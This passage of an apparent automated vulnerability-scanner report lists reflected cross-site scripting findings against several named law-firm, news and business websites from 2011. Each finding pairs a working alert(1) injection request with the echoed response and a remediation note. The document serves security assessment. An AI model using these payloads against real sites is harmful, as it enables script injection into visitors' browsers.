Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1154; path=/
Set-Cookie: PortletId=1145501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Retaining Our Diverse Talent</title>

...[SNIP]...
on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]>
...[SNIP]...

4.84. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /sitemap

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1163; path=/
Set-Cookie: PortletId=1154501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Site Map</title>
<meta name="language" content
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/sitemap/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/sitemap/Sitemap.aspx?a6862'-alert(1)-'2791e98804b=1';//]]>
...[SNIP]...

4.85. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /termsofuse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=3588901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28021


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Terms of Use</title>
<meta name="language" con
...[SNIP]...
document.aspnetForm.action = '/termsofuse/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/termsofuse/GeneralPageData.aspx?ce89f'-alert(1)-'5ebc528209d=1';//]]>
...[SNIP]...

4.86. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edc1"-alert(1)-"8a5e635d48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:47:57 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:47:57 GMT
Date: Wed, 19 Jan 2011 15:47:57 GMT
Content-Length: 22010
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.87. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b36"-alert(1)-"11f428f14f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:02 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:03 GMT
Date: Wed, 19 Jan 2011 15:48:03 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.88. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9d"-alert(1)-"77d9442451f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:08 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:08 GMT
Date: Wed, 19 Jan 2011 15:48:08 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.89. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 133fa"-alert(1)-"9a2b6004857 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:15 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:15 GMT
Date: Wed, 19 Jan 2011 15:48:15 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.90. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12fdc"-alert(1)-"b91d9019faa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:20 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86367
Expires: Thu, 20 Jan 2011 15:47:47 GMT
Date: Wed, 19 Jan 2011 15:48:20 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.91. http://www.dcchamber.org/chamber/memberDetail.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d392"><script>alert(1)</script>ceb88aaba32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.asp HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:48:15 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=0ilpmfogoftmdtsc2djk1fdtm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="/chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.aspindex.php?src=gendocs&ref=ERROR&link=ERROR&login=">
...[SNIP]...

4.92. http://www.dcchamber.org/chamber/memberDetail.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12668"><script>alert(1)</script>2f451230e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52 HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:48:20 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=pkp73ol8c1315pd6btr3ijgkr3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DC Chamber of Commer
...[SNIP]...
<a href="/chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52index.php?src=gendocs&ref=ERROR&link=ERROR&login=">
...[SNIP]...

4.93. http://www.dcregistry.com/cgi-bin/classifieds/classifieds.cgi [db parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcregistry.com
Path:   /cgi-bin/classifieds/classifieds.cgi

Issue detail

The value of the db request parameter is copied into the HTML document as plain text between tags. The payload e00cf<script>alert(1)</script>182e67954d6 was submitted in the db parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/classifieds/classifieds.cgi?db=rentalse00cf<script>alert(1)</script>182e67954d6 HTTP/1.1
Host: www.dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:48:03 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 528

We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/rentalse00cf<script>alert(1)</script>182e67954d6.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s
...[SNIP]...

4.94. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'>
...[SNIP]...

4.95. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<350)
{
   location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True'
}

</script>
...[SNIP]...

4.96. http://www.fulbright.com/index.cfm [eTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
Set-Cookie: CFTOKEN=35971701;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


           <html>
<head>
<title>


                   The International Law Firm of Fulbright & Jaworski


   
...[SNIP]...
<a href="">Washington, D.C.8d254<script>alert(1)</script>39610b88ceb</a>
...[SNIP]...

4.97. http://www.fulbright.com/index.cfm [eTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
